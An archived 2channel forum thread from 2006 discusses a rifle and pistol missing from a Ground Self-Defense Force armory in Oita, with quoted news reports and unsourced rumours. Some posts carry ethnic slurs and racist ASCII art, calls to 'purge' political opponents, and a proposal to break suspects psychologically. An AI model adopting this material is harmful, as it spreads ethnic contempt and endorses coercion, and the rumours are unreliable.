2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【注目】 小銃、拳銃って出てきたの?

1 :専守防衛さん:2006/10/25(水) 12:56:57
陸上自衛隊第4師団(司令部・福岡県春日市)は
8日、玖珠(くす)駐屯地(大分県玖珠町)で、
隊舎内の武器庫に保管していた64式小銃(全長約1メートル)1丁、
拳銃1丁、弾倉3個と双眼鏡1個を紛失した、と発表した。


2 :専守防衛さん:2006/10/25(水) 13:05:01
重複スレ!

3 :専守防衛さん:2006/10/25(水) 13:05:23
たくさんの人数で探しているって以前言ってたが、その後は何の報道も
無いし、結局闇から闇へ消えるのかな?
内部の犯行?で概ねめぼしはついているって言っていたようだったが?

4 :専守防衛さん:2006/10/25(水) 13:07:47
>>2
重複してないォ?

5 :専守防衛さん:2006/10/25(水) 13:14:06
重複してるし、もうそっとしててほしい!

6 ::2006/10/25(水) 13:16:50
>2  かならず、いちゃもん付ける香具師がいる場合ありw

7 :専守防衛さん:2006/10/25(水) 13:17:09
http://obaco.blog68.fc2.com/blog-entry-5551.html

まぁ、無い物は無いのかな?
昔は、空の薬きょう一つでも這いつくばって探したけどね、そうそう、19普連で
小銃が無くなった時は、大村の大野原で一ヶ月近く捜索したっけ?
あんときはやるせなかった!



8 :専守防衛さん:2006/10/25(水) 13:26:05
イチャモンなんかじゃないよ!だいたい今頃スレ立てる方が可笑しい!まぁ好きにしろ!

9 :専守防衛さん:2006/10/25(水) 14:17:27
64で撃たれたら死ぬな確実に。 急所を外れたとしても当たった部分は肉が飛びちって中から腐ってくるだろう

10 :専守防衛さん:2006/10/25(水) 14:25:54
一喝しろっ
(´・ω・`)

11 :専守防衛さん:2006/10/25(水) 15:19:39
大分県民ですが、追求してください

大変な問題ですよ

12 :専守防衛さん:2006/10/25(水) 15:37:31
>>11
だよね、一大事ではあるし、別にスレ立てても問題は無いと思うけど、あれは不思議だよね!
でも、弾が無ければ撃てないし…

13 :専守防衛さん:2006/10/25(水) 15:39:18
>>5 >>8
あんた怪しいね?何か知ってるの?


14 :専守防衛さん:2006/10/25(水) 16:02:50
弾は猟銃用のヤツが使えるらしいよ

毎日、
「なんじゃこりゃあ〜」って言う練習してます。

15 :専守防衛さん:2006/10/25(水) 16:04:29
故障!(挙手)

16 :専守防衛さん:2006/10/25(水) 16:06:27
>>15

挙手はグーでしなさい

17 :専守防衛さん:2006/10/25(水) 17:24:54
弾装が無けりゃ使いづらいだろう!
売ってないだろうし、前にネットオークションで64の下部被筒だけ売ってあった
ってことがあったらしいが、捜査対象になったらしいし

18 :専守防衛さん:2006/10/25(水) 17:49:17
308win蒔いたら生えてくるョ

19 :専守防衛さん:2006/10/25(水) 18:01:46
4戦本管の武器係か当直幹部とかは?マジ知らんのかな?
そうそう勝手には出せんでしょ?

20 :専守防衛さん:2006/10/25(水) 18:06:33
玖珠゛

21 :専守防衛さん:2006/10/25(水) 18:21:11
民間人ですが…内部の犯行としか思えないのですが

22 :闇撃ち暗殺検閲官庁警察自公創価安倍小泉ら犯罪暴露の生き証人:2006/10/25(水) 22:15:19

破壊活動専門のテロ政党が、こういう時には必ず税金犯罪が大規模無制限に横行する場合に限るものだ!

自民創価党と公謀員犯罪の大規模な殲滅と徹底した粛清が大規模に必要な時なのであるということさ!

今日まで、破壊活動か犯罪しかして来なかった自公創価党と全公謀員を殲滅し、大規模に粛清しなければならない!
天誅せよ!



23 :専守防衛さん:2006/10/26(木) 09:15:38
↑ >>22
すごいね、全てのスレにカキコしてる!
それにしてもウザイ!

協賛唐 か? 卯欲か?

24 :専守防衛さん:2006/10/26(木) 09:34:50
もう探すのやめたんでしょ?

飽きただろうし…


25 :専守防衛さん:2006/10/26(木) 09:37:57
>>17
弾倉3個も無くなったらしいよ 狩猟用の7.62ミリ弾でばっちりでしょ!

26 :専守防衛さん:2006/10/26(木) 15:26:34

早く見つかれ!奪ったやつは早く出せ!
内部の犯行!
内部の犯行!
内部の犯行!
4師団全員で捜せや!
玖珠から射撃に行った十文字原? ついでに日出生台も
それから、営内はもちろん、営外の官舎の、たんす、押入れも!



27 :専守防衛さん:2006/10/26(木) 15:34:26
週に一回とか探してる進捗状況を発表してもらいたい

近くに住むものとしては

28 :専守防衛さん:2006/10/26(木) 15:41:52
>>27
捜してないかもよ! 本気で捜せば出ないわけがない!
どうせ沢山あるし、旧型の小銃だし・・・ってか?



29 :専守防衛さん:2006/10/26(木) 15:42:42
>>26
あんま滅多な事を言うでない!
トップが日出生台全域草刈りするぞ!
一列に並べ!!
って言いだすぞ。
そんなん定期整備だけで勘弁なり

30 :専守防衛さん:2006/10/26(木) 17:48:51
早く見つかるといいね

早期の解決を祈念申し上げます

31 :専守防衛さん:2006/10/26(木) 17:49:50
>>29
訂正!日出生台は許す!!

32 :専守防衛さん:2006/10/27(金) 09:45:47
もう、あきらめたのだろうか?

33 :専守防衛さん:2006/10/27(金) 09:54:11
あんたらが諦めろ!

34 :専守防衛さん:2006/10/27(金) 13:55:18
>>33
が怪しい! 刑務隊さーん!

35 :専守防衛さん:2006/10/27(金) 14:39:38
思い出したけど、昔 19普連の大野原で…の時は、確か最後は占い師に見てもらって、
探し出したよね!そうそう、今回も占ってもらえばどうよ?草刈りやら穴掘りばっかじゃ出ないし…

36 :専守防衛さん:2006/10/27(金) 14:50:58
64式の上下被筒は、昔よく自衛隊富士演習場で埋まっていた・・・
焼け焦げていたから何かの都合で燃やしたんだろうな・・・
丁度、砲兵の森あたり・・・ベトナム戦争の真っ最中のころには、
演習場を掘ると、銃弾がぎっしりと詰まった、まっ新の弾薬箱(木梱包)
が埋まっていることもあったし、不発の銃弾やグレネ−ドがごろごろ
転がっていた。
M16もよく転がっていて、幹部が来た富士に届けていたよ・・・・
あれって、米軍が横流ししていたのかも知れない。


37 :専守防衛さん:2006/10/27(金) 16:18:02
、 l ‖_ >:=‐  ̄ ̄「 l| l    } 、  ヽ   んっ んんっ…
ヽ 、i`─ '´ ___   | ll ⌒; j  、   ヽ
 \ヽ r,ニ、‐‐'‐' u .l ll   '_ノ   、    ヽ 
   ` \"\):、    | l|  `、 ヽ  、   ヽ
      ヽ  ゞ'^     ! ll   `、 ヽ  、    ヽ
     丿   .:::.  | l|     \ ヽ、 、   ヽ
     丶、_        | l|/lヽ   `>=‐- ミヽ   `、
          `⌒ヽ_  | l| | ハ  /´     `ヽ   、
  チュパ  /  /. `´| l| | l / 〃        `、  、
 チュパ  /   /     | l| | l' 〃            
このレスを見た人はコピペでもいいので
10分以内に3つのスレへ貼り付けてください。
そうすれば14日後好きな人から告白されるわ宝くじは当たるわ
出世しまくるわ体の悪い所全部治るわでえらい事です




38 :専守防衛さん:2006/10/28(土) 10:21:51
帳簿上のミスってことで片付くのだろうか?


39 :専守防衛さん:2006/10/28(土) 11:33:24
武器庫の鍵、銃架の鍵触れるのは限られてるんでしょ?

40 :専守防衛さん:2006/10/28(土) 11:45:28
たぶん連隊長以下幹部の処分があり、

41 :専守防衛さん:2006/10/28(土) 12:13:04
憶測で語るなよ!!

42 :専守防衛さん:2006/10/28(土) 12:14:07
ここは2chだ。憶測以外で物を言うやつがいるってのか?

43 :専守防衛さん:2006/10/28(土) 12:16:53
>小銃が無くなった時は、大村の大野原で一ヶ月近く捜索したっけ?
今の自衛官は幸せだよね。
日本軍だったら切腹だもんね。

44 :専守防衛さん:2006/10/28(土) 13:38:28
大野原はきつかったね!ほとんどはげ山状態にまでして探したもんね・・・
でも、確かに最後は占い師雇ったって聞いたぞ!
で、占い師の言うとおりだったらしいし



45 :専守防衛さん:2006/10/28(土) 13:50:38
もう、探すところは無いんだよね?
それでも探してるのだろうか? 今も

46 :専守防衛さん:2006/10/28(土) 19:31:02
玖珠は、地鶏のたたきがうまい!

47 :専守防衛さん:2006/10/28(土) 19:55:36
腹を据えた確信犯の犯行(反抗)?

48 :専守防衛さん:2006/10/28(土) 21:13:39
だろうか?
とりあえず、やだきい!解決してほしいんじゃ!

49 :専守防衛さん:2006/10/28(土) 22:11:58
大分は紅葉そろそろかな?
県民の人?教えて!

50 :専守防衛さん:2006/10/29(日) 00:35:47
実のところもう探してねーんだろ?

51 :専守防衛さん:2006/10/29(日) 14:10:13
玖珠の隊員達はどうしてるのかな?
訓練は?山は?銃剣道は?ランニングは?外出は?特外は?
ストレス溜まってるんじゃないかな? 

52 :名無し:2006/10/29(日) 23:48:24
九州全ての演習場を捜索しろ

53 :専守防衛さん:2006/10/29(日) 23:57:42
所持番号みたいなので管理されてるんじゃないの?
誰のが無くなったかは分かってるんでしょ

54 :専守防衛さん:2006/10/30(月) 00:32:59

馬鹿か?

55 :専守防衛さん:2006/10/30(月) 00:35:19
もう誰も興味ないし・・いいんじゃぁない。

56 :専守防衛さん:2006/10/30(月) 01:14:17
馬鹿は54

57 :専守防衛さん:2006/10/30(月) 09:36:55
まきこまれた一般の隊員達が可哀想だね! あそこの部隊は明るくて気さくな人が
すごくたくさん居るし… 

早く見つかりますように!!


58 :専守防衛さん:2006/10/30(月) 09:40:40
>>53だけど、バカなの?銃って受け渡しのとき番号言うよね

59 :専守防衛さん:2006/10/30(月) 13:46:55
新兵の武器授与式の時は言ったなー ボロイ64の番号、大声で言った!

60 :専守防衛さん:2006/10/30(月) 16:28:11
>>58
新教でしか言わんだろ!

61 :専守防衛さん:2006/10/30(月) 17:52:41
自分の小銃のナンバーがかわる度に授与式なんか無いしね!
とにかく、どんなかたちでも早く解決してほしいわ! 玖珠の連中が可哀想だ!
しっかり管理してなかった一部の担当者、管理者と持ち出した?やつが悪いだけで、
一般の隊員は何も悪くないと思うのさ…
連帯責任は新教の営内班の時くらいでいいじゃんね!!

甘いかな?

62 :陸秀夫 ◆Bf5xepPT82 :2006/10/30(月) 18:04:34
あのさ、
全員一箇所に集めて、能力開発セミナーみたいに
他人の欠点を言わせたり、糾弾したりして、自尊心をはぎ取って、
もうみんなが泣きながら「私は悪い人間です!」って叫ぶくらいまで
追いつめてやれば、ゲロすると思うんだなぁ。

あるいは
自衛隊ならでは合法的拷問である「訓練」に全員参加させて
レンジャーみたく食事の制限と体力の消耗を図って
精神的に追いつめてやればいいんじゃないかと思う。

「お前が小銃を盗んだんだな!」「レンジャー!」

63 :専守防衛さん:2006/10/30(月) 18:09:50
>>62

通事は、幹部達は犯人で無いと断定しての想定ですか?

64 :陸秀夫 ◆Bf5xepPT82 :2006/10/30(月) 18:18:20
>>63
BUの幹部なんざ、取調室で県警の強面に恫喝されて
ゲロしないわけがありません。

そういう意味では、土着の先任クラスやI幹部が一番しぶといでしょうねぇ。

65 :専守防衛さん:2006/10/30(月) 18:29:41
やっぱり服務事故の陰に土着ありってか

66 :専守防衛さん:2006/11/01(水) 09:13:30
今日から11月、大分も秋真っ盛りでいい感じなんだろうけどね!
寒くなる前に解決してほしいです!

67 :専守防衛さん:2006/11/01(水) 12:16:15
占い師に頼めば解決するんじゃなぃ

68 :専守防衛さん:2006/11/01(水) 13:33:35
それしかないよ!! 
あのFBIに雇われる超能力者なんかどうでしょうね?
テレビ番組で時々やってるような…

69 :専守防衛さん:2006/11/02(木) 12:52:47
それいいかも!

70 :専守防衛さん:2006/11/02(木) 15:45:00
まだ4線車は容疑者扱いで家にも帰れない。他の職種は毎日帰宅許されているそうだが、
4線車だけが毎日責められて、休みを全く与えられず、何日に一回しかも夜遅くに
帰宅させ、すぐ次の朝早くには戻る生活らしい!


71 :専守防衛さん:2006/11/03(金) 10:30:41
外に出られなきゃ、中で何してるんだろ?
週休二日で、休みの日は?隊内クラブで飲むだけ?

かわいそー!

72 :専守防衛さん:2006/11/04(土) 17:31:58
シャバは3連休!

73 :専守防衛さん:2006/11/04(土) 19:28:07
  ∩∩  日 本 の 治 安 は俺 た ち に 任 せ ろ !    V∩
  (7ヌ)                 ∧∧          (/ /
 / /                 /支 \            ||
/ /  ∧_∧     ∧_∧   (`ハ´  )  .∧ ∧   ||∧_∧
\ \( ´∀`)―--< `∀´ > ̄      ⌒ヽ(´∀`)=) // ( ´∀`)∩
  \       /⌒   ⌒ ̄ヽ 中国人/~⌒    ⌒ /  /    ( )
   | マスゴミ  |ー、韓国人  / ̄|    //`i      /  / \\∧_ノ
    |匿名  | |     / (ミ   ミ)  | 在日 | /ノービザ .\
   |報道 | |     | /      \ |    |/ 北側 |(_)
   |    |  )    /   /\   \|       ヽ  /\ \
   /   ノ | /  ヽ ヽ、_/)  (\    ) ゝ  | /   \ |
   |  |  | /   /|   / レ   \`ー ' |  |  / /     | |


74 :専守防衛さん:2006/11/05(日) 19:41:26
早期解決を祈念して、今夜も焼酎いただきま〜す
ファイト!4戦

75 :専守防衛さん:2006/11/05(日) 20:44:12
                        ,,,,,     *         。  o
   o    m         ★―――(っll)\     ,,,,,,,__
       )| |   ,,,,,,,,, _            \\   (mn)_  ヽ   *
  +    ( _l   [|,,★,,|,]    nm       〉 .〉 ∧国∧ 7 /     。 ゚
       \ \_<■ε■> / ノ ∧酋∧ / ./  <´潘`*.>/ /   。
 。   *    \_ ̄_ ̄  )/ / <‘∀‘* > / (~⌒\   ト/ )        *
          / ̄ \ /ヽ  ̄ ̄    ~ /   \\ \/ /     ・
      ,⊂二二/〉   /    ̄ ̄|    イ     \\_,/|    +    *
            /   /      ヽ     |      ,)    ノ
  。゚        (  <./         \    \/⌒\   ノ、      *  。
           /\  \          〉     /\  \ γヽ     。   +
             核 で 開 く 僕 ら の 未 来


76 :専守防衛さん:2006/11/05(日) 21:42:38
いまごろ、かの国でコピー作ってるだろうな。
装備品はネットで購入して、紛れるだろうな。

一刻もはやく64廃止して、全部隊89一括購入=コストダウンしてください(個人的な願望)



77 :専守防衛さん:2006/11/08(水) 09:11:14
陸自隊員3人聴取 武器紛失、大分県警が家宅捜索

 陸上自衛隊玖珠駐屯地(大分県玖珠郡)で今年9月、部隊武器庫から64式小銃や拳銃などが紛失した事件で、
陸自から要請を受けた大分県警などが、窃盗容疑で、同駐屯地の隊員3人から事情聴取していたことが7日、分かった。
県警は同容疑で3人の住居などを家宅捜索したが、武器はみつからなかった。

 陸自などによると、9月8日の同駐屯地第4戦車大隊の武器庫の点検で、拳銃1丁と弾倉2個、64式小銃1丁と弾倉1個、双眼鏡が紛失していることが発覚した。

 陸自は無施錠の引き出しに放置された鍵を使って隊員が武器庫から小銃などを持ち出したとほぼ断定。全隊員からの聞き取り調査や、警務隊によるうそ発見器(ポリグラフ)の反応、
日ごろの素行言動などから武器持ち出しに関与したとみられる3人を割り出した。
3人はいずれも曹士クラス。

 陸自は警察と検察当局に協力を要請。大分県警などが窃盗容疑で、3人から事情聴取した。
捜索は住居のほか、立ち寄り先などでも行われたが、武器はみつかっていない。
陸自も「国民に多大の不安を与えている小銃・拳銃の発見、回収が緊急かつ最優先の課題」として、警察とは別に捜索を続けている。

 陸上幕僚監部では、関係者に管理監督責任を問う厳しい処分を検討しており、年内にも処分を発表する方針だ。
(産経新聞) - 11月8日8時1分更新
http://headlines.yahoo.co.jp/hl?a=20061108-00000009-san-soci

78 :専守防衛さん:2006/11/08(水) 09:14:12
日ごろの素行言動などから武器持ち出しに関与したとみられる3人の曹士に
警務隊によるうそ発見器(ポリグラフ)だって!
動きがあったんだね!



79 :専守防衛さん:2006/11/08(水) 09:22:54
陸自隊員3人聴取 武器紛失、大分県警が家宅捜索
陸上自衛隊玖珠駐屯地(大分県玖珠郡)で今年9月、部隊武器庫から64式小銃や拳銃などが紛失した事件で、
陸自から要請を受けた大分県警などが、窃盗容疑で、同駐屯地の隊員3人から事情聴取していたことが7日、分かった。
県警は同容疑で3人の住居などを家宅捜索したが、武器はみつからなかった。
陸自などによると、9月8日の同駐屯地第4戦車大隊の武器庫の点検で、拳銃1丁と弾倉2個、64式小銃1丁と弾倉1個、双眼鏡が紛失していることが発覚した。
陸自は無施錠の引き出しに放置された鍵を使って隊員が武器庫から小銃などを持ち出したとほぼ断定。
全隊員からの聞き取り調査や、警務隊によるうそ発見器(ポリグラフ)の反応、日ごろの素行言動などから武器持ち出しに関与したとみられる3人を割り出した。
3人はいずれも曹士クラス。
陸自は警察と検察当局に協力を要請。大分県警などが窃盗容疑で、3人から事情聴取した。捜索は住居のほか、立ち寄り先などでも行われたが、武器はみつかっていない。
陸自も「国民に多大の不安を与えている小銃・拳銃の発見、回収が緊急かつ最優先の課題」として、警察とは別に捜索を続けている。
陸上幕僚監部では、関係者に管理監督責任を問う厳しい処分を検討しており、年内にも処分を発表する方針だ。
(産経新聞) - 11月8日8時1分更新
http://headlines.yahoo.co.jp/hl?a=20061108-00000009-san-soci

80 :専守防衛さん:2006/11/08(水) 09:24:33
早く解決してほしいです!
早く解決してほしいです!
早く解決してほしいです!



81 :専守防衛さん:2006/11/08(水) 09:58:32
3人が断定されたっても、勝手に決めて犯人扱いにしてんのと違うの?
何故なら3人がもし本当の犯人なら、自衛官として武器の隠し場所いうでしょ。
勝手に犯人扱いしてるんなら、本人達が武器のありかなどわかるはずもない。
なんか、始めから筋の無い話ばっかりで、嫌な感じ!

82 :専守防衛さん:2006/11/08(水) 11:08:35
ですよね!

83 :専守防衛さん:2006/11/08(水) 12:09:12
日頃の素行言動って、マニアだから疑われてるってことかw

84 :専守防衛さん:2006/11/08(水) 12:48:29
かわったお友達が居る…とか?
他にも、何か活動とか?


85 :専守防衛さん:2006/11/08(水) 12:56:50
やるな!刑務隊!!
でもうそ発見器つかうとは!

86 :専守防衛さん:2006/11/08(水) 13:22:03
いらない奴の職種や任地デタラメにして辞めさせる
みたいにいらなそうな奴をゲラゲラ笑いながら
犯人にしてんじゃねえの?

87 :専守防衛さん:2006/11/08(水) 14:36:30
スパイがいるのでは?

88 :専守防衛さん:2006/11/08(水) 14:36:40
発表してるということは、かなり確信あるのだろうか?

89 :専守防衛さん:2006/11/08(水) 17:30:21
なければ3人なんて言わないだろ?

90 :専守防衛さん:2006/11/08(水) 17:44:01
>>86
だね。紛失したものが無い限り犯人と呼べない。


91 :専守防衛さん :2006/11/08(水) 18:31:30
見つかるまで探せよ!その銃が犯罪に使われたらどうするの?

92 :専守防衛さん:2006/11/08(水) 18:35:55
始末書書いて手打ちにせい

93 :専守防衛さん:2006/11/08(水) 18:46:36
皆でごめんなさい腕立てだ

94 :専守防衛さん:2006/11/08(水) 18:51:54
>>90
普通の感覚では、そうなるがな。
人権意識が希薄な連中の言うことだから、信用できない。

95 :専守防衛さん:2006/11/08(水) 18:56:14

>>89 の間違い。

96 :専守防衛さん:2006/11/08(水) 18:56:39
盗んだ3人は免職!
上司の訓練係幹部及び担当陸曹は停職の重処分
上司の中隊長、連隊長、群長、師団長まとめて停職アンド更迭!
幕長、副長減給!更迭!
統幕長まっさきさんじしょく!
以上!


97 :専守防衛さん :2006/11/08(水) 19:11:49
これにて一件落着

98 :専守防衛さん:2006/11/08(水) 19:22:54
北朝鮮問題もあって、上手く密かに幕引きできそうな感じだったがな。

99 :専守防衛さん:2006/11/08(水) 22:37:32
2ヶ月持ち越しおめでとう!!

100 :専守防衛さん:2006/11/08(水) 22:56:06
諸悪の根源は防衛大学校にあり!!


101 :専守防衛さん:2006/11/09(木) 13:16:44
で、逮捕はまだなの?

102 :専守防衛さん:2006/11/09(木) 20:25:11
                  チョッパリが気になって気になって
                          夜も眠れないニダ
       ∧_∧,、,            __
      <#`Д ( (二( ̄ ̄ ̄ ̄ ̄ ̄(   ○
     /⌒\ / / |   ̄ ̄ ̄|| ̄ ̄ ̄ ̄ ̄
     /  \  / ノ        .||
     |    /ー' '          .||
  / ̄ ̄ ̄ ̄ ̄ ̄ ̄^\   ...||
   ̄|| ̄ ̄ ̄ ̄ ̄ ̄|| ̄    示
    || ̄ ̄ ̄ ̄ ̄ ̄||    ./|| \


103 :専守防衛さん:2006/11/10(金) 09:45:04
チョッパリ
朝鮮語の、日本人に対する蔑称。チョクパリとも表記。
「豚の足」と言う意味。日本人のつま先が、足袋や鼻緒で二つに別れている様子を、豚の蹄になぞらえて言う。
在日朝鮮人に対する蔑称として「パン(半)チョッパリ」という蔑称も。




104 :専守防衛さん:2006/11/10(金) 19:00:59
持ち越しどころかもうとっくに見つかってるw



105 :専守防衛さん:2006/11/10(金) 23:12:49
>>104
やっぱり買い戻しに手間取っているのか?
買った奴を銃刀法違反で逮捕出来ないのか?

106 :専守防衛さん:2006/11/10(金) 23:35:11
おい見つかっただといいかげんなこというなソースだせ


107 :専守防衛さん:2006/11/11(土) 09:26:44
>>106
おまえ民間人だね?

報道もしなかったからね。  信じなくても結構 
 

108 :専守防衛さん:2006/11/11(土) 09:31:03
そいつの家から、M16の部品も出たって?

109 :専守防衛さん:2006/11/11(土) 13:43:50
>>108
それは知らなかった

110 :106:2006/11/11(土) 17:19:24
107
いかにも、おれは民間人だよ。
だったら出てきたってだれからきいたの?
いえなきゃうそになるよな

111 :専守防衛さん:2006/11/11(土) 19:07:41
>>110
いちいちソースソースってうざいんだよ!素人が!
これは身内だけが知りえる情報だよ。
んで、匿名で晒してるだけだ、馬鹿!
そんなに気になるんなら現場に来てみろやw
不法侵入者としてたっぷりお灸をすえてやるぜw

112 :専守防衛さん:2006/11/11(土) 19:20:05
>>110
なんだ? 随分粘着してるなw

ウラを取りたければ駐屯地に電凸でもしてみれば?  相手にされる保証はないがね。

113 :106:2006/11/11(土) 19:43:40
ソースのない情報は何も価値ないよ。
111の所属はどこ?まあ脳内自衛官の可能性もあるかww
じゃあ明日君の助言に従って駐屯地の中をのぞこうかな?
お灸は勘弁だけど、しかし、自衛官は野蛮だねーーー
まあ、身内で見つかった、見つからないて遊んでいるこったな

114 :112:2006/11/11(土) 19:57:49
>>113
オマエと比べりゃ自衛隊の連中は、この話題に興味をもっていないよ。



115 :専守防衛さん:2006/11/11(土) 20:12:37
大野原の件は、占い師の占いで湖の中探したけど見つからなくて、
結局は小銃盗んだ民間人からの新聞投書によって、佐世保市内のゴミ箱から
見つかったんじゃ無かったか?
伝聞だから、確かな情報じゃ無いが。


116 :専守防衛さん:2006/11/12(日) 13:12:06
本当に発見されればきちんと報道されるさ!
そうでなければ国民は納得しないし、信頼回復なんかできないと思う。
>>104さんの情報が正しければそれ以上に良いことはないしね!
>>114さんの言うとおりかもしれないけど、>>110さんみたいに心配している民間人(OB?)もいらっしゃるように、
地元住民や、自衛隊OB、すべての国民が気をもんでるんだし…
全部管理換のミスって言う人も中には居るけど、それも無いと思うし。
とにかく、どんなかたちででも解決してほしいね!4戦の連中が普通の生活に戻れるように
祈ってるよ!!


117 :専守防衛さん:2006/11/12(日) 18:12:42
はっきりいって、まだ見つかったかどうかわかんないんでしょ!

118 :専守防衛さん:2006/11/12(日) 21:55:58
まだだよね!
あ〜、まちどうしいわ!


119 :専守防衛さん:2006/11/14(火) 08:58:34
どうなったのかな?

120 :専守防衛さん:2006/11/15(水) 19:33:49
相変わらず進展なし・・・

121 :専守防衛さん:2006/11/16(木) 13:52:47
状況オワリ!
って声がききたいぞ!

122 :名無し:2006/11/16(木) 15:25:12
拳銃で自分の足を撃っちゃった映像
http://www.pandoratv.jp/11991/9587


123 :専守防衛さん:2006/11/16(木) 18:54:26
とうとう霊媒師まで登場?

124 :専守防衛さん:2006/11/16(木) 20:03:03
恐山のイタコにも頼んだら?

125 :愛国血盟團:2006/11/17(金) 14:13:10
自衛隊よ頑張れ!!
熱血的愛国者たる君たちにわれわれは大いに期待している。
試練こそが男を磨く!!自衛隊よ頑張れ!!
今、諸官の愛国心が試されている。
自衛隊よ頑張れ!!自衛隊よ頑張れ!!自衛隊よ頑張れ!!

126 :専守防衛さん:2006/11/17(金) 23:05:01
>>125
自作自演乙
      r;ァ'N;:::::::::::::,ィ/      >::::::::::ヽ
.      〃  ヽル1'´        ∠:::::::::::::::::i
       i′  ___, - ,. = -一   ̄l:::::::::::::::l
.      ! , -==、´r'          l::::::/,ニ.ヽ
      l        _,, -‐''二ゝ  l::::l f゙ヽ |、 ここはお前の日記帳じゃねえんだ
        レー-- 、ヽヾニ-ァ,ニ;=、_   !:::l ) } ト
       ヾ¨'7"ry、`   ー゙='ニ,,,`    }::ヽ(ノ  チラシの裏にでも書いてろ
:ーゝヽ、     !´ " ̄ 'l,;;;;,,,.、       ,i:::::::ミ
::::::::::::::::ヽ.-‐ ト、 r'_{   __)`ニゝ、  ,,iリ::::::::ミ
::::::::::::::::::::Vi/l:::V'´;ッ`ニ´ー-ッ-,、:::::`"::::::::::::::;゙ ,  な!
:::::::::::::::::::::::::N. ゙、::::ヾ,.`二ニ´∠,,.i::::::::::::::::::::///
:::::::::::::::::::::::::::::l ヽ;:::::::::::::::::::::::::::::::::::::::::::/ /
::::::::::::::::::::::::::::::! :|.\;::::::::::::::::::::::::::::::/ /

127 :賀正:2006/11/18(土) 19:31:20
正月までには見つかるかな?

128 :専守防衛さん:2006/11/18(土) 20:06:47
頼んだ霊媒師のレベルはどんなもんだ?
見つかってないとこみると、たいしたことないんだべ。
思い切ってスピリチュアルの江原にでも頼んでみろズー。
見えっかもスんねえぞ。

129 :専守防衛さん:2006/11/18(土) 20:48:08
まだ見つかってないんやね


130 :専守防衛さん:2006/11/18(土) 21:33:21
なかなか厳しいね。

131 :専守防衛さん:2006/11/20(月) 20:41:14
ぶっちゃけ小銃、拳銃の紛失で治安が左右されるわけではないし、
それより幕僚監部の裏金をどうにかしてくれ。
っと、愚痴ってみるテスト。。。

132 :専守防衛さん:2006/11/21(火) 18:50:03
もう一ヶ月以上も前に見つかってるのにまだこのスレ続いてんの?

133 :専守防衛さん:2006/11/21(火) 21:02:11
132詳細を教えろ

134 :専守防衛さん:2006/11/22(水) 05:09:34
>>133
ん? 何よその命令口調は?
あとアンカーくらいちゃんとつけれw

135 :専守防衛さん:2006/11/22(水) 13:41:35
まだ出てないよ!出れば出たって発表あるさ!


136 :専守防衛さん:2006/11/22(水) 14:11:30
>>133=>>113
粘着君乙

137 :132:2006/11/22(水) 19:33:28
内部で既に通達がでてんのよw だからもれのような地方勤務でも知ってる。
もう処分も通知済み。 もうオワテるね 

>>135が言ってるような発表は今後出ないと思うよ。 マスコミも紛失の時は煽れる
から食いつくけど、見つかったのは報道してもメリットないから流さないね。 

138 :専守防衛さん:2006/11/22(水) 19:48:41
へー、見つかったんだー。全然知らんかったわ!で、闇に葬るの?

139 :専守防衛さん:2006/11/22(水) 20:16:05
137           俺は西方で勤務してるけどそんな通達は見たことない。まだみんな頑張って探してるのだからいい加減なこと書かないで!

140 :専守防衛さん:2006/11/22(水) 20:25:41
>>139
ほう 東北では見つかったと報告あったけど

141 :専守防衛さん:2006/11/22(水) 20:27:33
>>140
うそをつくな

142 :専守防衛さん:2006/11/22(水) 20:29:41
>>139
たぶん触手が違うんだろな。 関係の無い触手の豚居には流れなかったかもよ
武○触手あたりなら情報流れてる。

143 :専守防衛さん:2006/11/22(水) 20:54:01
まーだ見つからんのか?


144 :専守防衛さん:2006/11/22(水) 22:11:20
早く消し去りたいから、いろんな情報流すやからがいるんだろうね!年越したくないし。

145 :専守防衛さん:2006/11/23(木) 08:14:03
廃車置き場の74、一両くらいもってってもばれないよね

146 :専守防衛さん:2006/11/23(木) 08:24:15
61ならいいよ!

147 :専守防衛さん:2006/11/23(木) 09:32:34
法務官って何する人?
警務隊の親分?

148 :専守防衛さん:2006/11/23(木) 20:18:10
懲戒担当
刑事担当の警務とは関係なし
法務官なんかあったの?

149 :専守防衛さん:2006/11/23(木) 21:58:17
法務官は行政処分である懲戒担当のほか法律相談しています
警務隊は刑事担当なのでまったく関係ありません

150 :専守防衛さん:2006/11/24(金) 19:25:49
ヤフ憶にでも出ないかな?w

151 :専守防衛さん :2006/11/25(土) 22:01:38
小銃・拳銃はもう出ちこんの。既に時遅しっちゃ。

152 :専守防衛さん:2006/11/26(日) 17:48:24
戦車はなくすなよ!(盗られるなよ!)
                                      __
                                     /___ヽ        |
                            ┴─=iiiiiiニニ「(゚Д゚ 〔〕       | 「l
                            ____rn〕〔__⊆__)      __..| |.|
                            rt〕__,,.〕ff;;-----''--゙'=--.--::┴‐‐iL|_|__
  ________,,----、_____,,,,,,,,,,r‐‐f='F´ ̄ ̄i ̄ ̄i ̄ ̄ ̄ ̄ ̄ミ[]____.ー|tttttt|
 └────――‐L...........L......」_____|_ii [    i    i       ミ[]-------〕L-‐''  ______
                       __,二ニ=――――r――――‐‐r''''''''''''''''''''''''''''^ ̄ ̄ ̄      /
             .,.;-‐‐‐‐‐‐==='F‐‐‐‐‐‐‐:r‐‐‐‐‐‐‐:r‐‐‐‐‐‐‐‐r''‐‐‐‐‐‐r‐‐‐‐‐‐‐::r‐‐‐‐‐‐‐‐‐:f「|
             /`‐、_       i      .i      i      i      i      i _.-―t‐:;tコ,,」ユ
            ''''rt‐---r----ッ---,---ッ---、---ッ---、-;;ッ---、----ッ--.、---ッ---<´)<0>,)-‐‐‐'^''´
             ヾ、_=‐´ヽ_,_.i    .i_,_,i    .i_,_i    i.i    .i_,_,_,i    i_,_,i    .i___,,./
                `^''=、,tヽ.,__,.ノn.,.ヽ.,__,.ノn .ヽ.,__,.ノ, ヽ.,__,.ノn.nヽ.,__,.ノn .ヽ.,__,.ノ_/ 
                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


153 :専守防衛さん:2006/11/26(日) 18:14:35
エンジンかけれる人は限られるよな。

154 :専守防衛さん:2006/11/26(日) 18:17:05
数数えたら2両ぐらい無かったりしてな。

155 :専守防衛さん:2006/11/26(日) 18:42:30
すぐバレるだろ。

156 :専守防衛さん:2006/11/26(日) 18:44:21
盲点
銃もあり得ないことがあり得た。
すぐ数えに行け。>>155

157 :専守防衛さん:2006/11/26(日) 18:45:22
でかいから隠したってさすがに分かるだろー!

158 :専守防衛さん:2006/11/26(日) 18:46:22
